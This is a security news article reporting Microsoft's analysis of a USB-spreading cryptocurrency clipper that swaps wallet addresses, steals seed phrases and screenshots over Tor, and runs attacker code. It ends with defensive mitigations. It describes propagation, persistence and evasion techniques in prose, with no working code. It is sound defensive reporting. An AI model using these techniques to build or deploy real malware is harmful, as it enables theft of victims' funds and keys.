Microsoft has unveiled a sophisticated Windows-based cryptocurrency clipper campaign that has been targeting users since February 2026. This campaign employs clipboard-intercepting malware, equipped with self-spreading capabilities, and utilizes the Tor anonymity network to obscure its communications.
Technical Insights into the Clipper Malware
The Microsoft Defender Security Research Team elaborated on the mechanics of this clipper in a recent analysis. According to their findings, “The clipper in this campaign relies on Windows Script Host and ActiveX-driven logic to launch a bundled Tor proxy and poll a hidden-service C2 [command-and-control] server.” This malware is designed for high-frequency clipboard theft, screenshot exfiltration, and wallet-address substitution.
What sets this clipper apart is its departure from conventional installation methods. It does not rely on traditional installers or exposed IP-based C2 infrastructure. Instead, it deploys a portable Tor client, routes traffic through a local SOCKS5 proxy, and merges data theft with remote code execution, effectively transforming a financially motivated stealer into a lightweight backdoor.
Mechanism of Attack
Clipper malware is particularly insidious as it silently monitors a user’s clipboard, intercepting sensitive data that is pasted into the short-term buffer. Its primary focus is on cryptocurrency transactions, where it substitutes wallet address strings that match known blockchain address patterns, redirecting funds to addresses controlled by the attackers.
The attack vector involves distributing a malicious Windows Shortcut (LNK) file via USB storage devices. When opened, this file triggers a worm component that checks if the machine is already infected. If it is not, the worm proceeds to fetch the payload from a remote server. A second module, the clipper, is then deployed to harvest and exfiltrate cryptocurrency wallet information.
The LNK payload scans the USB device for common document types such as DOC, XLSX, and PDF. If any are found, it hides them and creates new LNK files that share the same names but contain arguments leading to the worm component. Consequently, when an unsuspecting user attempts to open what they believe is a harmless document, they inadvertently activate the malware.
Persistence and Evasion Techniques
The worm component not only ensures propagation to other uncompromised USB drives but also deploys scheduled tasks to maintain persistence for both itself and the stealer component. The clipper utilizes WScript and ActiveXObject to interact with the operating system, cleverly exiting if Task Manager is detected among the actively running processes to evade detection.
In the final stages of its operation, the malware launches a renamed Tor binary in a hidden window, generates a unique victim identifier, and registers it with an external server. Following this, the malware enters a continuous loop, polling the C2 server for instructions while simultaneously monitoring the clipboard every 500 milliseconds to extract seed phrases and private keys.
As noted by Microsoft, “It also hijacks cryptocurrency addresses by replacing copied wallet values with attacker-controlled alternatives and uploads screenshots through Tor.” If the C2 server returns an EVAL response, the malware executes attacker-supplied code at runtime.
Recommended Mitigations
In light of these findings, Microsoft has advised defenders to prioritize behavioral detections over static signatures. Key recommendations include:
- Monitoring for PowerShell-based screen capture and the use of WScript, CScript, or related script engines for launching curl, cmd.exe, PowerShell, or unexpected executables.
- Disabling AutoRun/AutoPlay for all removable media.
- Blocking LNK execution from removable drives via Group Policy Objects (GPOs).
- Restricting unnecessary use of wscript.exe or cscript.exe.
- Reviewing clipboard-related and screen-capture behaviors on devices that handle sensitive financial workflows.
